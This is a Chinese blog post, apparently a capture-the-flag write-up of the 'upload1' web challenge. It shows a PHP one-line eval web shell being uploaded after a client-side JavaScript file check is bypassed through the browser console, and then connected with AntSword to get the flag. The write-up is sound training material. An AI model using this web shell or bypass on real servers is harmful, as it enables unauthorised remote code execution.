avatar

攻防世界web进阶upload1

打开网站,发现只存在一个选择文件框和一个上传按钮。

我们可以考虑直接上传一个一句话木马尝试。

1
<?php @eval($_POST['shell']);?>

快速弹出警告框,让上传图片文件。猜测是前端js判断。

F12打开控制台,成功发现js代码,右击直接删掉。

重新选择一句话木马,此时发现上传按钮无法点击,在F12console中将按钮的disabled设置为false

1
submit.disabled=false

按钮的id值可通过源代码查看得到。

点击上传,得到上传路劲。

通过蚁剑连接一句话木马,成功得到flag。

后记

后来写wp的时候,发现可以省略删除js源码那一步,因为虽然弹窗了,但是没有清空选择的文件,可以直接通过更改按钮属性直接上传。

总结

写了几道php源码的题,什么phps源码泄露、反序列化,头大,碰到这道简单的,开心死了。

文章作者: 0pt1mus
文章链接: https://superj.site/2020/03/13/20200313214351/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 0pt1mus

评论